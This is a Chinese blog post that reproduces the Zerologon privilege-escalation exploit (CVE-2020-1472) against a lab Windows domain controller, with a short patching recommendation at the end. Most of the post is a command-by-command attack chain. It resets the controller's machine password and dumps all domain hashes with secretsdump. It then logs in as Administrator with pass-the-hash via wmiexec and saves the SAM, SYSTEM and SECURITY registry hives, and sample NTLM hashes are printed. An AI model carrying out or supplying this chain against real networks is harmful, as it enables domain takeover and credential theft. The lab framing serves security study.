微软NetLogon特权提升漏洞复现(CVE-2020-1472)

已于 2023-03-13 15:33:53 修改
阅读量2.4w 收藏 1
点赞数 2
文章标签: 安全 微软 信息安全 区块链 xss
于 2021-02-22 08:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23936389/article/details/113976736
版权
本文详细介绍了NetLogon特权提升漏洞(CVE-2020-1472)的利用过程,包括查看域控主机名、POC检测、漏洞利用、凭证导出、横向移动等步骤,并提供了相关工具和GitHub资源。同时,给出了微软官方发布的补丁作为修复建议,提醒用户及时打补丁以防止攻击。
摘要由CSDN通过智能技术生成

2020年08月12日, 微软官方发布了 NetLogon 特权提升漏洞 的风险通告。攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。

漏洞编号:CVE-2020-1472

漏洞级别:严重

漏洞利用:

1、查看域控的主机名

2、poc检测

poc:https://github.com/SecuraBV/CVE-2020-1472.git
python3 zerologon_tester.py TEST-AD 10.1.1.24

返回Success,说明漏洞存在。

3、exp漏洞利用,将域账号进行重置。

exp:

https://github.com/blackarrowsec/redteam-research

 4、导出域内所有用户的凭证

secretsdump.py 'test.com/TEST-AD$@10.1.1.24' -no-pass

此时,TEST-AD$ hash已被替换为空。

TEST-AD$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

得到了域控的hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:44f077e27f6fef69e7bd834c7242b040:::

5、使用administrator的hash横向连接

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:44f077e27f6fef69e7bd834c7242b040 TEST-AD$/Administrator@10.1.1.24

  6、获取计算机账号原始hash

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save


secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

7、将该原始计算机帐户哈希还原
github地址:https://github.com/risksense/zerologon
python3 ./reinstall_original_pw.py TEST-AD 10.1.1.24 9b54a25e20fa4f8c7667edf62a03e2bd

8、查看TEST-AD$账号的hash,已成功还原。

secretsdump.py 'test.com/bypass:abc123!@10.1.1.24' -just-dc-user 'TEST-AD$'

修复建议:

微软官方已发布补丁,找到操作系统版本的漏洞补丁,并进行补丁下载安装。

Bypass--
关注
CVE-2020-1472域渗透 NetLogon 权限提升漏洞
千寻的博客
06-13 282
模拟环境:获取了一个加入了域的计算机权限,在system账号权限的情况下,将域管密码置空,导出域管hash,然后进行连接
Netlogon 特权提升漏洞(CVE-2020-1472)复现
bigblue00的博客
09-17 1810
漏洞简介: CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空。 影响版本: Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Servic
CVE-2020-1472漏洞复现
blue_fantasy的博客
01-14 2303
Text. 简介 2020年8月11号,微软修复了Netlogon 特权提升漏洞2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸域控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。 原理 详细原理参看:ZeroLogon的利用以及分析 - 安全客,安全资讯平台 本文对
CVE-2020-1472: NetLogon特权提升漏洞(附exp复现
02-06 2万+
漏洞描述: 2020年08月12日, 微软官方发布了 NetLogon 特权提升漏洞 的风险通告。攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 漏洞级别:严重 漏洞编号:CVE-2020-1472 漏洞复现: 准备工具: Impacket工具包:htt...
域内大杀器CVE-2020-1472复现
茶寂的博客
12-25 5608
前一段时间打ctf第一次接触域渗透,其中CVE-2020-1472被称为域控的大杀器,在本地搭建了个环境复现一下 CVE-2020-1472影响的版本: Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Ser
CVE-2020-1472复现与完整利用
热门推荐
Shanfenglan's blog
10-10 14万+
CATALOG漏洞原理利用1.修改文件impacket.dcerpc.v5.nrpc2.置空机器账户yukong$密码3.读取administrator密码4.下载目标的sam文件为下一步恢复机器密码做准备5.破解sam文件查看过去的机器密码6.重制密码yukong$机器密码7.查看密码是否恢复成功 漏洞原理 原理比较复杂,有兴趣的可以看看下面链接上的文章https://www.freebuf.com/articles/system/249860.html 利用 1.修改文件impacket.dcerpc.
CVE-2020-1472 poc复现
m0_46580995的博客
09-15 473
测试脚本(https://github.com/SecuraBV/CVE-2020-1472) python3 exp NetBIOS名称(域名)ip 搭建winsever2016主域控制器搭建(https://blog.51cto.com/lizmfinder/2127943)
NetLogon特权提升漏洞CVE-2020-1472复现
玄道的网安博客
09-15 2537
简介 CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Window..
CVE-2020-1472 Netlogon特权提升漏洞分析及复现
include_voidmain的博客
03-03 7141
0x01漏洞背景 NetLogon远程协议是一种在Windows 域控上使用的RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新计算机域密码。 微软MSRC于8月11日发布了Netlogon 特权提升漏洞安全通告。此漏洞CVE编号CVE-2020-1472,CVSS评分:10.0。由Secura公司的Tom Tervoort发现提交并命名为ZeroLogon。 0x02漏洞分析 Netlogon协议使用的是自定义的加密协议来让客户端(加
CVE-2020-1472 NetLogon 特权提升漏洞1
08-03
CVE-2020-1472 NetLogon 特权提升漏洞1
CVE-2020-1472-ZeroLogon复现
qq_56426046的博客
11-15 1098
Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远 程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空。
NetLogon特权提升漏洞CVE-2020-1472复现及问题解决
Love&Share
09-17 1万+
NetLogon特权提升漏洞CVE-2020-1472复现 漏洞描述 2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472漏洞等级:严重,漏洞评分:10分。CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。 漏洞成因 Netlogon协议身份认证采用了挑战-响应机制,其中加密算法是AES-CFB8,并且
Ladon插件-CVE-2020-1472域控提权漏洞EXP
K8哥哥
09-16 1291
漏洞简述 2020年08月12日, 360CERT监测发现Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472漏洞等级:严重,漏洞评分:10分。 攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pac
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9280
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Serv...
CVE-2020-1472域内提权漏洞
xhwfa的博客
03-15 3950
一、漏洞简介 2020年8月11号,微软修复了Netlogon特权提升漏洞2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸域控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。 二、漏洞环境搭建 域控:windows server 2008 R2,IP:192.168.16
域渗透04-漏洞CVE-2020-1472
最新发布
GalaxySpaceX的博客
10-12 539
域渗透04-漏洞CVE-2020-1472
CVE 2020-1472 Netlogon 漏洞
明哥哥知识分享
10-13 298
1.复现环境 DC: os:windows 2012 server ip:192.168.236.132 攻击机: os:kali ip:192.168.236.130 2.影响版本 Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 201
基于NetLogon权限提升漏洞CVE-2020-1472)的域控踢拳学习
qq_40806924的博客
06-29 271
NetLogon权限提升漏洞CVE-2020-1472) **漏洞评分10分,**漏洞利用后果严重,未经身份认证的攻击者可通过使用 Netlogon 远程协议(MS-NRPC)连接域控制器来利用此漏洞。成功利用此漏洞的攻击者可获得域管理员访问权限。 影响版本: Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Ser
(环境搭建+复现CVE-2020-1472 NetLogon 域内提权漏洞
daxi0ng的博客
01-25 3965
0x00 简介 Netlogon组件是Windows上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。 Netlogon远程协议是一个可用的在Windows域控制器上的RPC(remote procedure call protocol,远程过程调用协议,允许像调用本地服务一样调用远程服务)接口,用于对域中的用户和其他服务进行身份验证,最常见的是方便用户使用NTLM(N...
CVE-2020-1472
08-30
CVE-2020-1472是一个Windows域控中的严重的远程权限提升漏洞。该漏洞是由于微软Netlogon协议中错误使用加密算法而引起的。在进行AES加密运算时,微软使用了AES-CFB8模式并错误地将初始化向量(IV)设置为全零。这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bypass--

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值